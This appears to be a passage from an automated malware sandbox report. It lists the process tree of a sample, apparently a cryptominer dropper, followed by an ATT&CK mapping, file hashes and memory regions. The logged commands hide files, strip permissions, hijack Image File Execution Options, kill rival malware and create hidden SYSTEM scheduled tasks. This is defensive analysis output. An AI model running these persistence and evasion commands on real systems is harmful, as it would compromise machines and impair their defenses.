- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\demc.bat2⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='server.exe' and ExecutablePath='C:\\program files (x86)\\stormii\\server.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\program files (x86)\stormii\server.exe" /d everyone3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a "C:\program files (x86)\stormii"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\program files (x86)\stormii" /d everyone3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\program files (x86)\\windows nt\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete SuperProServerST3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im ftp.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\ftp.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\ftp.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\ftp.exe /g users:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /g users:f3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\SysWOW64\ftp.exe3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\System32\ftp.exe3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\ftp.exe /d everyone3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\Drivers\etc\hosts /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\Drivers\etc\hosts /g users:f3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
C:\Windows\SysWOW64\attrib.exeattrib -h -r -s -a C:\ProgramData3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im CPUInfo.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im up.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im block.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im cpu.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im svshostr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\sc.exesc stop xtfya3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete xtfya3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "Network Support"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Network Support"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "HomeGroup Support"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "HomeGroup Support"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop xtfy3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete xtfy3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Natioanl3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Natioanl3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Natihial3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Natihial3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "Interactive Services Detection Report"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Interactive Services Detection Report"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "mssecsvc2.0"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "mssecsvc2.0"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "mssecsvc2.1"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "mssecsvc2.1"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop ServiceMais3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ServiceMais3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop ServiceMaims3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ServiceMaims3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\ProgramData\dll3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\dll /d everyone3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Progra~1\dll3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Progra~1\dll /d everyone3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r c:\wax.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\wax.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Natihial\svshostr.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\Natihial\cmd.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\expl0rer.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\svchost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='cmd.exe' And ExecutablePath='C:\\ProgramData\\Microsoft\\Natihial\\cmd.exe'" Call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Adobe Flash Player Updaters" /f3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\dll\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\dll\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\Natioanl\\svchostr.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\Natioanl\\csrss..exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\nm\\winlogin.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im tasksche.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\tasksche.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\tasksche.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im srvany.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\srvany.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\srvany.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im WUDHostServices.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\System32\WUDHostServices.exe3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WUDHostServices.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wbmoney.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im GGtbviewer.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Netohad.pif3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Qrhkveb.com3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Tnntknl.com3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Snwhtdw.bat3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dllhsot.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Tasksvr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im serices.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im seever.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im mssecsvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im svchsot.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsacs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im nsa.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im csrs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WerFault.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WScript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im NV-NO.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im NV.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Eternalblue-2.2.0.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Eternalchampion-2.0.0.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Doublepulsar-1.3.1.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\system\\explorer.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\Fonts\\explorer.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundllhost.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systmss.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ystmss.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauc1t.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nanol.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostr.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lservice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im ystmss.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im wuauc1t.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\demo.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc start Schedule3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn RavTask /f3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn GooglePinginConfigs /f3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 240 /tn "RavTask" /tr "C:\windows\IIS\free.bat" /ru "system" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "GooglePinginConfigs" /tr "C:\windows\IIS\CPUInfo.exe" /sc onstart /ru "system" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\RavTask.job3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\GooglePinginConfigs.job3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /tn "RavTask"3⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\windows\IIS\free.bat"1⤵
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.12⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im NV-NO.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im NV.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im Eternalblue-2.2.0.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im Eternalchampion-2.0.0.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im Doublepulsar-1.3.1.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /im mysqld.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /im CPUInfo.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /im jvav.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\PING.EXEping -n 5 127.0.0.12⤵
- Runs ping.exe
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GooglePinginConfigs"2⤵
-
C:\windows\IIS\CPUInfo.exeC:\windows\IIS\CPUInfo.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Registry Run Keys / Startup Folder
1Hidden Files and Directories
2Modify Existing Service
1Scheduled Task
1Defense Evasion
Virtualization/Sandbox Evasion
1Modify Registry
1Hidden Files and Directories
2Impair Defenses
1File Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tem.vbsFilesize
275B
MD5ef1c7052536cd8a4ed2912e520c2a730
SHA1372c30cd30ec0ba499ed497453295bb84e89b86b
SHA256060183c7d23452e3f89d914049218eae7e84ce725e10d315638dc644a23873fc
SHA5127bdc914f8e002fc6141cdab3b4619a54735555ccb8fd508a57d341bfe2967f159b464b35954a120fdd38b6e9422663511964367fbfea07994f2653d9b9f85fae
-
C:\Windows\IIS\CPUInfo.exeFilesize
5.3MB
MD51065f9b7c189f4a22d7f11626f16b976
SHA1562ea85b1d91f08448b2885d8346231f311d656f
SHA2563889f6902bcbcb7cc477c599b3fec4864ffe0ce6c34a6079473232d5bf5c1de0
SHA512bd112a5741087ba50dcfb201b39a23202030107bd069067f20e38a5706492fb134a00b117952e29479b42da2a04a498ce5df06187c34e065cea94538bed60c41
-
C:\windows\IIS\CPUInfo.exeFilesize
5.3MB
MD51065f9b7c189f4a22d7f11626f16b976
SHA1562ea85b1d91f08448b2885d8346231f311d656f
SHA2563889f6902bcbcb7cc477c599b3fec4864ffe0ce6c34a6079473232d5bf5c1de0
SHA512bd112a5741087ba50dcfb201b39a23202030107bd069067f20e38a5706492fb134a00b117952e29479b42da2a04a498ce5df06187c34e065cea94538bed60c41
-
C:\windows\IIS\free.batFilesize
379B
MD5857fc3145d5aee4399bf6c9fd9dc8245
SHA118c27ecbebc5a3095e95690f2399c7b5e92e40fd
SHA2562401f4b6f34644668ee50911fb7e9d51c82b65776eea940f0e8e16ff9ec9d68e
SHA512289da4490f7623cca94adb6f19006dfa5628a1080ac963199e05fdca65a1f2d7db888f5aa63ee264c5c6c781cb802e8a8d07cec14c8ab4cf7be2ad07516caf35
-
\??\c:\windows\demc.batFilesize
7KB
MD5a17bd95441d3fa37660e87842dc896aa
SHA183951f95e5739593ac0a2d71b56075509298e542
SHA2563457579ecd591d2905e833be4aa7215e0302623447c1072bb55586c4a0284203
SHA512bd7cb5dbc9f11ace523bc89486b8d097f6c092a9f09b1dc847d7b4854db7f42a292aef20bd4d3d89a743f67607ebb0156327644def83fd5ea30c239297e53b1f
-
\??\c:\windows\demo.batFilesize
511B
MD511275993a1a8f44371ab48820422b273
SHA101a96b635ffea21d3d7ac6c4694ce1da25bcbb33
SHA25659f0d74e831cbd6b08b14e7c4efbe383b0ea8b7463fda81c35acee799c983e6e
SHA512db1df17de51e48d18cfc145983b1d9851e94f9fc908e99d5534516b81677e1e8c353d438422b45fd9702b85e0d9103297a86313b6bdc654703f01f23f4aab74c
-
memory/240-157-0x0000000000000000-mapping.dmp
-
memory/420-198-0x0000000000000000-mapping.dmp
-
memory/648-175-0x0000000000000000-mapping.dmp
-
memory/872-177-0x0000000000000000-mapping.dmp
-
memory/916-190-0x0000000000000000-mapping.dmp
-
memory/1056-174-0x0000000000000000-mapping.dmp
-
memory/1060-148-0x0000000000000000-mapping.dmp
-
memory/1132-149-0x0000000000000000-mapping.dmp
-
memory/1316-167-0x0000000000000000-mapping.dmp
-
memory/1332-185-0x0000000000000000-mapping.dmp
-
memory/1408-173-0x0000000000000000-mapping.dmp
-
memory/1448-159-0x0000000000000000-mapping.dmp
-
memory/1468-151-0x0000000000000000-mapping.dmp
-
memory/1532-199-0x0000000000000000-mapping.dmp
-
memory/1536-169-0x0000000000000000-mapping.dmp
-
memory/1660-171-0x0000000000000000-mapping.dmp
-
memory/1860-170-0x0000000000000000-mapping.dmp
-
memory/1936-184-0x0000000000000000-mapping.dmp
-
memory/1956-194-0x0000000000000000-mapping.dmp
-
memory/2084-146-0x0000000000000000-mapping.dmp
-
memory/2308-176-0x0000000000000000-mapping.dmp
-
memory/2312-197-0x0000000000000000-mapping.dmp
-
memory/2412-150-0x0000000000000000-mapping.dmp
-
memory/2668-188-0x0000000000000000-mapping.dmp
-
memory/2756-136-0x0000000000000000-mapping.dmp
-
memory/2764-182-0x0000000000000000-mapping.dmp
-
memory/2800-165-0x0000000000000000-mapping.dmp
-
memory/2844-161-0x0000000000000000-mapping.dmp
-
memory/2964-153-0x0000000000400000-0x0000000000A2E000-memory.dmpFilesize
6.2MB
-
memory/2964-132-0x0000000000400000-0x0000000000A2E000-memory.dmpFilesize
6.2MB
-
memory/3104-186-0x0000000000000000-mapping.dmp
-
memory/3112-158-0x0000000000000000-mapping.dmp
-
memory/3120-139-0x0000000000000000-mapping.dmp
-
memory/3124-192-0x0000000000000000-mapping.dmp
-
memory/3128-180-0x0000000000000000-mapping.dmp
-
memory/3140-152-0x0000000000000000-mapping.dmp
-
memory/3236-163-0x0000000000000000-mapping.dmp
-
memory/3316-131-0x0000000000000000-mapping.dmp
-
memory/3328-145-0x0000000000000000-mapping.dmp
-
memory/3352-179-0x0000000000000000-mapping.dmp
-
memory/3360-178-0x0000000000000000-mapping.dmp
-
memory/3428-130-0x0000000000000000-mapping.dmp
-
memory/3696-162-0x0000000000000000-mapping.dmp
-
memory/3784-164-0x0000000000000000-mapping.dmp
-
memory/3928-135-0x0000000000000000-mapping.dmp
-
memory/3952-160-0x0000000000000000-mapping.dmp
-
memory/3992-142-0x0000000000000000-mapping.dmp
-
memory/4016-172-0x0000000000000000-mapping.dmp
-
memory/4020-187-0x0000000000000000-mapping.dmp
-
memory/4204-155-0x0000000000000000-mapping.dmp
-
memory/4272-191-0x0000000000000000-mapping.dmp
-
memory/4304-195-0x0000000000000000-mapping.dmp
-
memory/4356-143-0x0000000000000000-mapping.dmp
-
memory/4376-138-0x0000000000000000-mapping.dmp
-
memory/4392-166-0x0000000000000000-mapping.dmp
-
memory/4444-189-0x0000000000000000-mapping.dmp
-
memory/4476-181-0x0000000000000000-mapping.dmp
-
memory/4480-144-0x0000000000000000-mapping.dmp
-
memory/4592-206-0x00000000771E0000-0x0000000077383000-memory.dmpFilesize
1.6MB
-
memory/4592-205-0x0000000000400000-0x0000000000F53000-memory.dmpFilesize
11.3MB
-
memory/4592-204-0x0000000000400000-0x0000000000F53000-memory.dmpFilesize
11.3MB
-
memory/4592-207-0x0000000000400000-0x0000000000F53000-memory.dmpFilesize
11.3MB
-
memory/4592-202-0x0000000000400000-0x0000000000F53000-memory.dmpFilesize
11.3MB
-
memory/4592-203-0x00000000771E0000-0x0000000077383000-memory.dmpFilesize
1.6MB
-
memory/4608-196-0x0000000000000000-mapping.dmp
-
memory/4748-141-0x0000000000000000-mapping.dmp
-
memory/4864-140-0x0000000000000000-mapping.dmp
-
memory/4876-183-0x0000000000000000-mapping.dmp
-
memory/4920-147-0x0000000000000000-mapping.dmp
-
memory/4932-193-0x0000000000000000-mapping.dmp
-
memory/5068-137-0x0000000000000000-mapping.dmp
-
memory/5072-168-0x0000000000000000-mapping.dmp